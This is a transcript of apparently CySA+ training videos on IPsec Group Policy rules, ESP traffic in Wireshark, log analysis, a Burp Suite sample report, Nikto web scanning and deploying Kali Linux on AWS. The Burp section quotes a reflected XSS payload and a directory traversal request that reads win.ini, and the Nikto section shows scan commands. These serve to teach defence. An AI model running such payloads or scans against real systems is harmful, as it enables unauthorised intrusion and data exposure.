So from the Start menu, let's open up the Group Policy Management tool. So I'm going to go down under
Windows Administrative Tools, and in the Gs, sure enough, there's Group Policy Management. Every Active
Directory domain has a Default Domain Policy.
[Video description begins] The "Group Policy Management" console that opens has a "Group Policy
Management" category in the navigation pane. The category has a single node, Forest Domain1.Local, which
is expanded and which includes a "Domains" node. The "Domains" node, which is expanded, contains a
"Domain1.Local" node. The "Domain1.Local" node, which is expanded, includes a "Default Domain Policy"
file and an "Admins" folder. [Video description ends]
That's a Group Policy Object, or GPO, that could potentially contain thousands of settings. Now it's linked or
associated with the domain. So by default, it flows down to all organizational units unless we've got an
organizational unit, or OU, as we do here, that's got Block inheritance turned on – that's what that little blue
symbol is.
So if I right-click, Block Inheritance means what it says – do not allow GPO settings from above to be
inherited into this OU. And in this case it's for admins. [Video description begins] After pointing to the
"Admins" folder, when he opens the corresponding context menu, Block Inheritance is one of the commands
that displays in it. [Video description ends]
So let's go ahead and right-click on the Default Domain Policy and choose Edit, so we can talk about where to
go to configure IPsec connection security rules. [Video description begins] The "Group Policy Management
Editor" application that opens has the following category in the navigation pane: Default Domain Policy. The
category contains two expanded nodes: Computer Configuration and User Configuration. The "Computer
Configuration" node contains two nodes: Policies and Preferences. [Video description ends]
That's going to be under Computer Configuration. You have to expand Policies and go to Windows Settings.
And under there, you then go into Security Settings. This is where the vast majority of Windows security
settings are configured in Group Policy. It's at the computer level as opposed to the user level, so the computer
that is joined to the Active Directory domain. [Video description begins] The expanded "Security Settings"
node includes a "Windows Defender Firewall with Advanced Security" node. [Video description ends]
So I'm going to go down under Windows Defender Firewall with Advanced Security. I'll just keep drilling
down under there. So we can see we can specify inbound and outbound rules just like we could on an
individual host. But we can also configure Connection Security Rules. So the difference here is, well, at least
by default, these rules will apply to all computers in the domain. Of course, except where Block inheritance
has been turned on for OUs.
[Video description begins] The expanded "Windows Defender Firewall with Advanced Security" node contains
another "Windows Defender Firewall with Advanced Security" node. He expands the node to reveal three
files: Inbound Rules, Outbound Rules, and Connection Security Rules. He selects the "Connection Security
Rules" file, and the corresponding view contains an empty table with the following columns: Name, Enabled,
Endpoint 1, etc.. [Video description ends]
So I'm going to go ahead and right-click on Connection Security Rules and choose New Rule.... [Video
description begins] A New Connection Security Rule Wizard appears. It has the following steps in the
navigation pane: Rule Type, Requirements, Authentication Method, Profile, and Name. Currently, Rule Type is
selected. It contains the following options: Isolation, Authentication exemption, Server-to-server, etc..
Currently, Isolation is selected. [Video description ends]
Depending on your requirements will determine which type of connection you select here. For example, here
I'm going to choose Server-to-server. I want to authenticate connections between specified computers. So I'll
select that. I'll click Next. [Video description begins] The "Endpoints" step, which is now selected, has two
sections: Which computers are in Endpoint 1? and Which computers are in Endpoint 2?. Each of these
sections includes an "Any IP address" option. [Video description ends]
It asks if I want to specify IP addresses on each end of the connection. So we can specify specific IPs that
would have this effective, so they would get these settings, in other words. I'm going to leave that to Any IP
address. [Video description begins] He clicks the "Next" button, and the "Requirements" step is selected. It
contains three options: Request authentication for inbound and outbound connections, Require authentication
for inbound connections and request authentication for outbound connections, and Require authentication for
inbound and outbound connections. [Video description ends]
Then we have the option – how do we want IPsec to be negotiated? Do we want to request it for inbound and
outbound connections or require it for inbound connections but request authentication for outbound or require
for inbound and outbound? Now by requiring for both inbound and outbound connections, that means that the
hosts affected by this Group Policy Object and these connection security rules, they will only talk to other
machines configured similarly.
Now in a highly secured environment, that might make sense. But if the machine, for example, needs to
connect to an Internet host, that could be a problem if that Internet host is not configured with the same IPsec
connection security rules. So I'm going to choose request for inbound and outbound. So if a machine that is
communicating with a server affected by this doesn't support IPsec, communication will still take place after
checking to see if IPsec could be used.
So I'm going to go ahead and click Next. [Video description begins] The "Authentication Method" step, which
is selected, contains two options: Computer certificate and Advanced. The "Computer certificate" option is
currently selected. The "Advanced" option has an associated "Customize..." button, which is currently
unavailable. [Video description ends]
We can use a computer certificate to authenticate machines to one another. But I can also click Advanced and
choose Customize.
[Video description begins] When he selects the "Advanced" option and clicks the "Customize..." button, a
"Customize Advanced Authentication Methods" dialog box appears. It contains two sections: First
authentication and Second authentication. The "First authentication" section includes an empty "First
authentication methods:" table with the following columns: Method and Additional Information. The table has
three associated buttons: Add..., Edit..., and Remove. The "Second authentication" section has a similar
"Second authentication methods:" table. [Video description ends]
And I've got two authentication methods I could select from where if the first one fails, the second one kicks
in. So if I click Add..., it can be Computer (Kerberos V5). [Video description begins] When he clicks the
"Add..." button associated with the "First authentication methods:" table, an "Add First Authentication
Method" dialog box appears. It contains the following options: Computer (Kerberos V5), Computer
(NTLMv2), Computer certificate from this certification authority (CA):, and "Preshared key (not
recommended):. Currently, Computer (Kerberos V5) is selected. [Video description ends]
Now that's the Active Directory authentication protocol. So for domain-joined computers, that's a good choice.
There already is an implied level of trust by virtue of those hosts being joined to Active Directory. You could
choose the older NTLM, LAN Manager, v2 protocol, PKI certificate. Or you could use the least secure option,
a preshared key, where you would put in the same item on both ends of a connection to allow them to
communicate.
But because in this case, I only want this applicable to domain-joined computers, it just makes sense to use
Computer (Kerberos V5). So I'm going to click OK and OK. [Video description begins] He returns to the New
Connection Security Rule Wizard. [Video description ends] And I'm just going to continue specifying which
network location profile that this applies to. [Video description begins] He clicks the "Next" button, and the
"Profile" step is now selected. It contains three selected checkboxes: Domain, Private, and Public. [Video
description ends]
I'm going to leave it selected for all, so whether we're joined to an Active Directory domain network, for a
private network, or public. And in the case of a server, servers don't get carried around and moved – at least
ideally they wouldn't be. So that probably isn't an issue when it comes to private and public networks. So I'm
going to click Next. [Video description begins] The "Name" step, which is now selected, has a "Name:" field
and a "Description (optional):" section. [Video description ends]
This is going to be called Request IPSec – so Request IPSec. And then I'll click Finish. Now at this point,
we've got that configured. Let's just switch back to that detailed screen. We've now got Request IPSec, which
is now enabled in Group Policy. [Video description begins] He returns to the "Group Policy Management
Editor" application. The "Request IPSec" rule now appears in the table in the "Connection Security Rules"
option. [Video description ends]
Now remember the Group Policy has to refresh before we can expect to see that our machines joined the
domain. So if I were to go back into Windows Defender Firewall and look at Connection Security Rules, I
don't see it there. But if I were to refresh Group Policy, so let's go to a Command Prompt. [Video description
begins] He types cmd in the Search box associated with the Start menu, and the corresponding application
opens. [Video description ends]
Let's run gpupdate /force to force a Group Policy update manually, just to test it. You wouldn't want to run to
every computer on the network and do this nor would you want to remote into them. It'll just happen
automatically. Normally, the refresh interval is approximately between 60 and 90 minutes.
Now that Group Policy has refreshed, if we check Windows Defender Firewall on this individual host, we'll
see the Request IPSec connection security rule. [Video description begins] He returns to the "Windows
Defender Firewall with Advanced Security" console. The Request IPSec rule now appears in the table in the
"Connection Security Rules" file. [Video description ends]
And when a session has actually been established between two hosts that support IPsec, you would see it under
Monitoring. For example, you would be able to see that there is a security association or an SA between hosts
that support IPsec. [Video description begins] He expands the "Monitoring" node. It includes a "Security
Associations" node, which he expands to reveal two folders: Main Mode and Quick Mode. And when he clicks
the "Quick Mode" folder, the corresponding view includes an empty table with the following columns: Local
Address, Remote Address, Local Port, etc.. [Video description ends]
In this video, you will learn how to capture and analyze IPsec network traffic.
Objectives
[Video description begins] Topic title: IPsec Traffic Analysis. Your host for this session is Dan
Lachance. [Video description ends]
IPsec or IP Security is a protocol that's used to secure network transmissions. In particular, in this
demonstration, we're going to go through an existing packet capture to try to examine Encapsulating Security
Payload, or ESP, transmissions, which results from an IPsec configuration. But first, let's select a standard
transmission here. When I say "standard," I mean not encrypted with IPsec.
[Video description begins] A Wireshark window titled IPSec_ESP_Ping.pcap is open. It includes the following
parts: a menu, a main toolbar, a filter toolbar, a packet list pane, a packet details pane, and a packet bytes
pane. The packet list pane contains a table with the following columns: No., Time, Source, Destination,
Protocol, etc.. Several packets appear in the table. A packet with Protocol listed as UDP is selected. The
packet details pane contains the following nodes: Frame 710, Ethernet II, Internet Protocol Version 4, User
Datagram Protocol, and Data (12 bytes). The "Ethernet II" node, which is expanded, includes two nodes:
Destination and Source. [Video description ends]
So I can see the source and destination IP addresses. I can see it's using UDP. And having that packet selected
here in Wireshark, if I look at the packet headers in the center of the screen, in the Ethernet II header, I can see
the source and destination MAC addresses. These are the 48-bit hexadecimal addresses at the hardware level
that are used for network interfaces on a local area network.
Now the next header is – in this particular case, with this captured packet – is an IP header, Internet Protocol,
which consists of many different fields, including the following protocol to follow, which is going to be UDP;
the Time to Live, or TTL, which is decremented by 1 every time the transmission passes through a router; and
of course, the source and destination IP addresses. [Video description begins] The presenter expands the
"Internet Protocol Version 4" node. The expanded node includes a "Flags" node. The expanded "Flags" node
includes the following headings: Time to live, Protocol, Source, and Destination. [Video description ends]
So this is all Layer 3 stuff in the OSI model. That's what IP, or Internet Protocol, maps to. Then we can see
User Datagram Protocol. We can see the source and destination port numbers. [Video description begins] He
expands the "User Datagram Protocol" node. The expanded node includes a "Source Port" heading and a
"Destination Port" heading; 60832 and 3389, respectively display against these headings. [Video description
ends]
Port 3389 is used for Remote Desktop Protocol, or RDP. The higher-level port is what the RDP host would use
to chat back to the client device making the connection. And then, of course, we can see the actual data
here. [Video description begins] He expands the "Data (12 bytes)" node. It includes a "Data" heading. [Video
description ends]
So the point is we know what kind of a transmission this is because we can see everything. We've even got
some ICMP traffic here. Now again, we can see the IP header, we can see the ICMP, or Internet Control
Message Protocol, header. [Video description begins] In the table in the packet list pane, he selects a packet
with Protocol listed as ICMP. The packet details pane now contains the following nodes: Frame 712, Ethernet
II, Internet Protocol Version 4, and Internet Control Message Protocol. [Video description ends]
We can read a lot here. Now let's filter out this packet capture for ESP, which stands for Encapsulating
Security Payload. This is a configuration of IPsec that encrypts the data part of the packet. Now when I do that,
we see that we have numerous captured packets using ESP, or Encapsulating Security Payload.
[Video description begins] When he enters esp in the filter toolbar, the table in the packet list pane now
contains only the packets with Protocol listed as ESP. The first packet that appears in the table is selected. The
packet details pane contains the following nodes: Frame 721, Ethernet II, Internet Protocol Version 4, and
Encapsulating Security Payload. [Video description ends]
Let's examine the packet headers. So I'm going to select one of them. So just like normal, we can see the
Ethernet header. So there's the source and destination MAC address. We can also see the IP header. So again,
that's got the source and destination IP as opposed to MAC addresses. So none of that stuff has been encrypted
because otherwise network routing equipment would have to have a decryption key to be able to see the IP
addresses to make a routing decision. So ESP doesn't do that.
And then we have an Encapsulating Security Payload header. So at this point, I don't know if there should be a
UDP header here, TCP, ICMP. And that's the point. We don't even know what kind of traffic it is. So we can
get up to Layer 3 in the OSI model. So the Ethernet header would be Layer 2, data link layer, of the OSI
model; so MAC addresses.
Then we've got Layer 3, the IP protocol with IP addresses. And that's as much as we can see. Now if you're
going to be using Encapsulating Security Payload, or ESP, bear in mind that if you've got any dependencies
such as with packet filtering firewalls or anything like that, to look at port numbers, they're not going to be able
to see it. Now of course, that would only apply to the machines that are communicating using IPsec with ESP.
But because everything after the IP header is encrypted, we can't even tell if it's TCP, UDP, let alone see a port
number. And that is the purpose of Encapsulating Security Payload.
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined how to mitigate security threats against data at rest and data in transit using
patching, data masking, secure disposal, IPsec, and more. We did this by exploring IT security threat
remediation challenges and the importance of hardware and software patching. We looked at the various
security control categories and the components of organizational security policies.
We looked at how to enable data masking in Microsoft Azure and how to work with watermarks in AWS with
Elastic Transcoder, talked about the use of compliance baselines and various types of IT security training
exercises. We also took a look at how to use automation to simplify and expedite security tasks.
We talked about how to securely delete a disk partition, how to use Microsoft Group Policy password lockout
settings, how to secure IP traffic with IPsec, and, finally, how to turn on IPsec in Windows and analyze IPsec
network traffic. In our next course, we'll move on to explore intrusion detection and network traffic analysis
using the Snort IDS tool among others.
Table of Contents
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance. He is an
IT Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+
certification exam is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats, and risks to an organization.
To configure and use threat detection tools, and secure and protect an organization's applications and systems.
In this course, we're going to explore how to analyze network traffic to detect the occurrence of malicious
attacks. I'll start by examining how to analyze suspicious log entries, view a simple Burp Suite report, use
Nikto to scan a web app, and how to perform a Kali Linux cloud deployment. I'll then install and configure the
Snort IDS tool and create a snort IDS rule, and I'll demonstrate how to analyse both ICS traffic capture and
HTTP user authentication traffic.
Next, I'll demonstrate how to perform voice over IP traffic analysis and online network traffic analysis, and
how to decrypt wireless traffic in Wireshark. I'll continue by demonstrating the use of hashing to detect file
changes through steganography. How to use the EERO app to monitor, block and configure notifications for
Wi-Fi connected devices. And how to perform encryption for sensitive files. I'll then demonstrate how to use
Aircrack-ng to crack protected Wi-Fi networks and how to use Kismet to detect Wi-Fi networks. Lastly, I'll
use Nessus to audit Amazon Web Services and to scan land hosts for malware.
[Video description begins] Topic title: Sample Log Entry Analysis. The presenter is Dan Lachance. [Video
description ends]
One important aspect of a cyber security analyst's job is to be able to analyze logs or alerts, and make sense of
them. Let's take a look at some example log entries from a variety of different types of network devices.
[Video description begins] He opens a file called "Log_Analysis_Anomalies.pdf". [Video description ends]
Our first example shows us NetBIOS traffic, we've got a date and timestamp.
[Video description begins] The following example of NetBIOS traffic is displayed: Jun 30 15:55:19 pf. Jun 30
15:48:03.688233 rule 3/(match) pass out on xl0: 192.168.2.10> 192.168.2.100: icmp: 192.168.2.100 udp port
137 unreachable. [Video description ends]
And it looks like there's a match made with a firewall rule. However, we can see that it's trying to talk to UDP
port 137, which is unreachable. UDP port 137 is used by the NetBIOS named protocol. Which is part of Samba
or SMB. Now Samba would be the version of the server message block that runs on open source platforms like
Linux. In Windows, it's SMB, Server Message Blocks. Now the purpose here is to use it to return NetBIOS
computer names. Now there are many known vulnerabilities for SMB port 137 and even the Metasploit
Framework has exploits that address this weakness. So by looking at this log, this is a good entry because we
can see that port 137 is not reachable. But what we're seeing is that there's an attempt to make a connection to
that to discover NetBIOS names. Our next example deals with network flooding.
[Video description begins] The following example of Network flood is displayed: [00001] 2020-03-10 8:47:22
[Root]system-critical-00001(third traffic alarm): Policy ID=4 Rate=190 bytes/sec exceeds threshold. [Video
description ends]
We can see that we have what appears to be a third traffic alarm, and there's a policy ID association with this
that's picking up that this is happening. And we can see that there's a configuration in the policy that checks for
a rate of 190 bytes per second that's exceeding a threshold. Now, what does this mean? It could be normal, we
need a baseline of what's normal at this time of the day. If it's normal at this time of the day, early in the
morning at 8:47 and 22 seconds for everyone to check their email, maybe this is normal for this network.
Also depends on which network we're talking about here, one that does or does not contain an email server.
However, at the same time, if this is not normal, this could be indicative of some kind of an attack. Maybe a
distributed denial of service attack. Where we might take steps to mitigate it, maybe by routing traffic to
nowhere such as a null device. Now that would be akin to black holing, which is one way to mitigate this type
of attack. The next thing we see is an indication of SMTP Relay.
[Video description begins] The following example of SMTP Relay is displayed: Apr 9 11:40:15 mail-sm-
mta[64376]: ruleset=check_relay, arg1=adsl199-92-91-206-196.adsl196-3.iam.net.ma, arg2=196.206.91.97,
relay=adsl196-97-91-206-196.adsl196-3.iam.net.ma [196.206.91.97], reject=553. [Video description ends]
So it looks like Relay here is being rejected, which is good. Most modern SMTP server daemons do not allow
relay by default. But it's an important configuration check when you're hardening an email server that supports
SMTP. Relay means what it says, it means that we can have a connection to an SMTP server that can relay
messages to any other email domain. Now the problem with this is it could be used for email spamming
campaigns for malicious users, which in turn can also be used to deliver malicious software, including
ransomware. In our last example, we have an example of a brute force password attack.
Now we know this because it looks like there are multiple usernames at the end of each line, that are tried in an
attempt to make a connection. And we keep getting user not found messages returned. So this indicates that a
brute force password attack is taking place against this particular host. Now what can be done to mitigate this
type of problem? The best solution would be first of all to control access to the network in the first place. But if
this is a public host that needs to have public visibility, maybe to allow remote users or users working from
home to connect, this might be a necessity. Although there are ways around that, maybe requiring a VPN
connection first, so it's not directly open to everybody on the Internet.
And also enabling account lockout threshold settings. So we could do that. But that's not going to stop
someone from trying to run this type of automated attack against the accounts. It would just lock an account if
one account is brute forced with multiple passwords. So we need to be aware of where log files are, ideally
they're being delivered centrally. And how to notice anomalies. Ideally, this would also be automated,
automation plays a big part here. You can configure a lot of network security appliances with rules that are
specific to your environment that will look for specific indicators of compromise.
[Video description begins] Topic title: Burp Suite Reports. The presenter is Dan Lachance. [Video description
ends]
Specialists in any field need to have the correct tool set and know how to use them effectively. A carpenter
needs the right tools just like a stonemason does. An IT security analyst needs to know which tools to use for a
given situation. And then how to interpret the results of it.
[Video description begins] A web page called "Burp Scanner Sample Report" opens. [Video description ends]
Burp Suite is a tool that's used for web app penetration testing and vulnerability identification. Basically, with
Burp Suite, you configure the tool such that web browser traffic to an app is first sent through Burp Suite so
that Burp Suite is really acting as a man in the middle or a proxy tool. So all requests to the app and the
responses from it pass through Burp Suite so Burp Suite can analyze it. So as a pen tester, you can also even
use the tool to replay HTTP requests to analyze how the app responds to it. So here, we're looking at a sample
report as a result of running the Burp Scanner. Now, the idea here is that we need to be able to identify, are
there any weaknesses that we need to address related to a web application?
And so if you're familiar with the OWASP top 10, some of the items that might have been discovered will be
related to some common web application vulnerabilities. Now, here in our report, we have some bad news
because it looks like we have some high severity issues. Nobody wants to see that in a report based on
vulnerabilities especially for an important web application. As we scroll down in the report, we have a table of
contents which is broken down by problems that were discovered. SQL injection, OS command injection, File
path traversal, XML external entity injection, it just goes on and on and on. For example, let's go down to
Cross-site scripting (reflected) and see what's up. So there's a background statement about what it is.
[Video description begins] He clicks a link called "9. Cross-site scripting (reflected)" and the corresponding
section opens. [Video description ends]
And also, some steps were remediating the issue. However, when we take a look at this, doesn't really look like
we have too many problems other than a couple of instances on a couple of pages on the web app. So if we
click on any one of those, then we get the details. This is high severity.
[Video description begins] He clicks a link called "/search/11/Default.aspx [Search Term parameter]". A
section called "9.1. http://mdsec.net/search11/Default.aspx[Search Term parameter]" opens. It further
includes sections called "Summary", "Issue detail", "Request", and "Response". [Video description ends]
We can actually see the request here that was captured by Burp Suite. It's highlighted in yellow.
[Video description begins] The following is the highlighted text in the Request and Response sections:
a5e5b5<script>alert(1)</script>5fd408f4c442ba780. [Video description ends]
What's happening is it looks like JavaScript is being injected within a field, or within a button, or being sent.
Could also be sent via a URL parameter to the application. Now, the problem with this is that JavaScript code
will execute on client browsers that view the page.
[Video description begins] He points to the highlighted text in the Response section. [Video description ends]
And so the problem with this is that we aren't properly validating the input to the app. We are allowing
untrusted, and in this case, malicious executable input from the user that gets executed when clients view it. So
we have some details here about what to do. And we see the issue here. It says, the value of the SearchTerm
request parameter is copied into the HTML document. And then that's how this attack was taking place. So you
get a lot of details in a Burp Suite report about that kind of stuff.
[Video description begins] He highlights the following text in the Issue detail section: The value of the
SearchTerm request parameter is copied into the HTML document as plain text between tags. [Video
description ends]
Let's go back to our table of contents. Let's look at File path traversal.
[Video description begins] He clicks a link called "3. File path traversal" and the corresponding section
opens. It further includes sections called "Summary", "Issue detail", "Issue background", "Issue remediation",
"Request", and "Response". [Video description ends]
So when you're looking at file systems, dot dot usually means to go back one level. Where single dot indicates
current directory. So having a payload with ..\..\ and so on allows attackers to potentially go back in the file
system of a web app beyond the file system location that houses web app files.
[Video description begins] He highlights the following text in the Summary section: Host:
http://mdsec.net. [Video description ends]
Now, it looks like the issue here is that on our given host that was tested, there is a Path here that refers to
some code to retrieve a file.
[Video description begins] He highlights the following text in the Summary section: Path:
/filestore/8/GetFile.ashx. [Video description ends]
Now, if we totally want to retrieve a file and give it this kind of a path reference, then if it's not properly
hardened, the web app might allow directory traversal to see other parts of the file system that definitely should
not be seen from the web.
[Video description begins] He highlights the following text in the Issue detail section: The
payload ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini was submitted in the filename parameter. [Video
description ends]
So down below, as always, we have issue remediations. So it talks about validation on user input.
[Video description begins] He highlights the following text in the Issue remediation section: User-controllable
data should be strictly validated before being passed to any filesystem operation. [Video description ends]
And then it talks about using specific and trusted filesystem APIs after validating user input to ensure that this
doesn't happen. So we can see the request here, and we can see the response.
[Video description begins] He highlights the following text in the Issue remediation section: After validating
user input the application can use a suitable filesystem API to verify that the file to be accessed is actually
located within the base directory used by the application. [Video description ends]
What's happening in the request is directory traversal is being used to go back into the windows folder on the
host to open up the win.ini file. And sure enough, we can see the contents of the win.ini file being returned.
[Video description begins] He points to the following line of code in the Request section, code starts: GET
/filestore/8/GetFile.ashx?filename=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1. Code
ends. [Video description ends]
And there are ways to solve this kind of a problem. There are solutions to it. So Burp Suite is a tool similar to
what you might use in the form of the OWASP ZAP tool. That's the Zed Attack Proxy. That OWASP tool does
the same type of thing where it allows the examination of web app requests and responses. It also can crawl a
web app looking for vulnerabilities. In the end, it allows people to harden their web applications.
[Video description begins] Topic title: Nikto Web App Scanning. The presenter is Dan Lachance. [Video
description ends]
Nikto, N-I-K-T-O is yet another web app scanning tool that will identify vulnerabilities of many different
kinds.
[Video description begins] He opens a command prompt window called "dlachance@kali: ~". The following
prompt is displayed: root@kali:~#. [Video description ends]
Here in Kali Linux where Nikto is automatically installed. I'm going to start by running nikto with a dash
capital H for help. And I'm going to pipe that to the more command to stop after the first screenfull.
[Video description begins] He executes the following command: nikto -H | more. The output displays the
details of nikto. The prompt does not change. [Video description ends]
We can kind of advance through this by just hitting our space bar.
[Video description begins] He points to the following text: -Tuning+ in the output. [Video description ends]
As I go all the way down through, I see that I have a -Tuning+ parameter where I can specify one or more of
these numbers together to run a couple of different types of scan tests such as 9 for SQL Injection.
[Video description begins] He highlights the following text: 9 SQL Injection. [Video description ends]
Or 6 to scan for Denial of Service vulnerabilities.
[Video description begins] He highlights the following text: 6 Denial of Service. [Video description ends]
Or 4 for cross site scripting injection type of weaknesses that might be shown.
[Video description begins] He highlights the following text: 4 Injection (XSS/Script/HTML).[Video description
ends]
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
So nikto and I'm going to put in -h, lowercase h. And I'm going to specify the IP address of a web app under
my control that I know has some problems, it's got some vulnerabilities. And what I'm going to do is simply
press Enter. We're going to start with that see what the returned output is.
[Video description begins] He executes the following command: nikto -h 192.168.4.54. The output displays the
details of the IP address entered in the command. The prompt does not change. [Video description ends]
So it's scrolling through and checking out the web app. And as I scroll back up to the top, I can see it's already
identified some items such as the version of the Apache server. We see here it's Apache 1.3.28. We don't want
that exposed. That's always a problem when it comes to attackers or potential attackers finding out that kind of
information. I can also see the version of Open SSL here, which is definitely going to be vulnerable to the
Heartbleed bug. And as we keep going back down, it's still running, we can see that it was able to go into
certain sub directories that probably should not be opened up, at least not prior to authenticating to the web
app. So we could, of course, explore those in a web browser to see what we could learn by visiting those.
[Video description begins] He highlights the following text: /backup/, /cgi-bin/test.cgi, /icons/, and
/images/. [Video description ends]
But there's a lot of other stuff that you can do with Nikto. So let's move on. First thing I'm going to do is run
nikto, again -h.
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
So I'll just bring up the previous command with the up arrow key, So I'm really just going to be adding to it.
I'm going to use the dash capital D or Display parameter. And I'm going to pass it a capital V for Verbose. So
the only thing I'm doing here is asking for more details as it checks for everything.
[Video description begins] He executes the following command: nikto -h 192.168.4.54 -Display V. The output
displays the details of the IP address entered in the command. The prompt does not change. [Video description
ends]
Now we can see from the output that indeed, there's a lot more that is showing now that we're asking for that
display. And it begs the question, well, how am I supposed to be able to go through that and derive any
meaning from it? Scrolling by on the screen doesn't mean anything. So I'm going to press Ctrl+C to interrupt
that. We're going to bring up the previous command again with the up arrow key. Because we want to talk
about writing the output to a file with the dash lowercase o parameter. And what I'm going to do is put this on
the root, I'm going to call it /niktoscan and html will be the file format. Let's go ahead and press Enter to let
that happen.
[Video description begins] He clears the screen and the prompt does not change. He executes the following
command: nikto -h 192.168.4.54 -Display V -o /niktoscan.html. The output displays the details of the IP
address entered in the command. The prompt does not change. [Video description ends]
Now using the Kali Linux GUI, I've navigated into the root of the file system where indeed I can see the
niktoscan.html file. Let's go ahead and double-click on that to open it up, just to get a sense of what the HTML
report or output looks like. So here we can see the results of our scan in HTML format.
[Video description begins] He opens a window called "File System - File Manager". He double-clicks the
niktoscan.html file and the file opens. [Video description ends]
So we can see the IP address of the host and the port number in this case 80. And the first thing I see is the
version of the Apache server.
[Video description begins] He highlights the following text: 192.168.4.54/ 192.168.4.54 port 80. [Video
description ends]
This is much easier to read than the screen output. And I can see a number of things that were tested.
[Video description begins] He points to the following text: HTTP Server: Apache/1.3.28 (Unix) mod_ssl/2.8.15
OpenSSL/0.9.7c. [Video description ends]
For example, anti-clickjacking, X frames options header is not present, that's a vulnerability. And as we keep
scrolling through here, looks like directory indexing has been found for the /backup folder on the website.
Directory indexing would allow someone to go into the file system, either through command line means on the
website or simply by browsing to it in a GUI environment. So we have a number of entries then, here, that
really need to be addressed to harden that web application. And that's really the purpose of Nikto. But it can
also identify specific types of weaknesses. Let's go back to the command prompt and examine that aspect of
the Nikto command line tool. So as an example, I'm just going to clear the screen. And I'm going to run nikto
once again, -h for host.
[Video description begins] He clears the screen and the prompt does not change. [Video description ends]
And I'll specify the IP address of our test web server. But what I want to do this time is use the -Tuning
command line tool. With -Tuning, we can specify certain types of things that we want to check for. For
example, a number 6 here means we want to test for denial of service types of vulnerabilities. And if that's all
we wanted to do, that's great, but we can also put together other numbers. So for example, mine means we
want to test for SQL injection vulnerabilities. We can put this all together, for example, with -Display, so we
want verbose display. And at the same time, we can also output that to a file. So I'm going to put this into file
on the root called niktoscan2. And again, it's going to be an HTML file.
[Video description begins] He executes the following command: nikto -h 192.168.4.54 -Tuning 69 -Display V -
o /niktoscan2.html. The output displays the details of the IP address entered in the command. The prompt does
not change. [Video description ends]
[Video description begins] Topic title: Kali Linux Cloud Deployment. The presenter is Dan Lachance. [Video
description ends]
Kali Linux is a great example of a free tool that has numerous penetration testing tools in one place.
[Video description begins] He opens a web site called "kali.org". [Video description ends]
It can be used for ethical hacking. Of course it can also be used by malicious users for nefarious tasks.
However, in the cloud environment, we can also deploy Kali Linux as a virtual machine appliance.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
So as opposed to downloading a Kali Linux ISO image and building an on premises virtual machine, instead,
we might opt to do it in the cloud.
[Video description begins] He opens the kali.org web site and closes the tab. [Video description ends]
So we're going to do that using Amazon Web Services where I've already signed in to the AWS Management
Console.
[Video description begins] He opens the AWS Management Console. [Video description ends]
I'm going to start by going down under All services Compute and EC2.
[Video description begins] A web page called "EC2 Management Console" opens. [Video description ends]
[Video description begins] A web page called "Instances | EC2 Management Console" opens. [Video
description ends]
I'll click the Instances view on the left and then I'll click Launch Instance up at the top.
[Video description begins] He clicks a button called "Launch Instance" and a page called "Step 1: Choose an
Amazon Machine Image (AMI)" opens. [Video description ends]
The key here is to select the appropriate Amazon Machine Image or AMI. This is, essentially, a blueprint of
what operating system and any additional software might be involved with what you select to build a virtual
machine. So I'm going to search here for kali and I'll press Enter. Now it says, there were none found in the
quick start catalog, nothing related to kali. But there is something in the AWS Marketplace and 14 results in
community AMIs. I'm going to click the one result in AWS and looks like in the AWS Marketplace, we have a
Kali Linux distribution, it's Free tier eligible. I'm going to go ahead and Select that Amazon Machine Image.
[Video description begins] He clicks a button called "Select" adjacent to an option called "Kali Linux". A
window called "Kali Linux" opens. [Video description ends]
[Video description begins] He clicks a button called "Continue" and the Kali Linux window closes. A page
called "Step 2: Choose an Instance Type" opens. [Video description ends]
I'm going to go through and select the other details related to this virtual machine, such as the Instance Type.
In the AWS cloud, all that means is how much underlying horsepower there is for the virtual machine. In terms
of vCPUs, the amount of Memory, and so on. So I'm going to go ahead and choose General purpose t2.micro
as an Instance Type, which is 1 vCPU and 1 GiB of RAM. Then I'm going to click Next.
[Video description begins] He clicks a button called "Next: Configure Instance Details". A page called "Step
3: Configure Instance Details" opens. [Video description ends]
I can determine whether I want to Enable a Public IP address for this host so I can connect to it directly, such
as using the free PuTTY tool to make an SSH connection.
[Video description begins] He clicks a drop-down list box called "Auto-assign Public IP" and selects an
option called "Enable". [Video description ends]
I'm going to click Next, I can also add additional storage volumes which I won't.
[Video description begins] He clicks a button called "Next: Add Storage". A page called "Step 4: Add Storage"
opens.
[Video description begins] He clicks a button called "Next: Add Tags". A page called "Step 5: Add Tags"
opens. [Video description ends]
And I'm going to use the Name tag and call it Kali Linux. That'll show up when I look at my Instances in the
view then I'll click Next.
[Video description begins] He clicks a button called "Add Tag". He enters Name under a column header
called "Key" and Kali Linux under the column header called "Value". [Video description ends]
It wants to open up SSH port 22 for remote management from any location. Of course, here I could specify the
IP address, my public facing IP address, if I'm going to be doing this from on premises. But I'll leave it as it is
for now. Now I'll click on Review and Launch, then I'll click Launch.
[Video description begins] He clicks a button called "Review and Launch". A page called "Step 7: Review
Instance Launch" opens. [Video description ends]
In Amazon Web Services if you haven't already, you have to have create a key pair that has a public and
private part.
[Video description begins] He clicks a button called "Launch". A dialog box called "Select an existing key pair
or create a new key pair" opens. [Video description ends]
Public part store by Amazon, you download and store the private part of the key, so you have to safe keep that.
I've already done that, so I don't have to Create a new key pair, I can choose an existing one. Just acknowledge
I have the private key and I'll choose Launch Instances.
[Video description begins] He clicks a button called "Launch Instances". [Video description ends]
After a moment, our Kali Linux virtual machine will be deployed in the AWS cloud. If I select it, I can also
choose to Copy the public IP address which I'll need if I want to make an SSH connection.
[Video description begins] The Instances | EC2 Management Console page opens. [Video description ends]
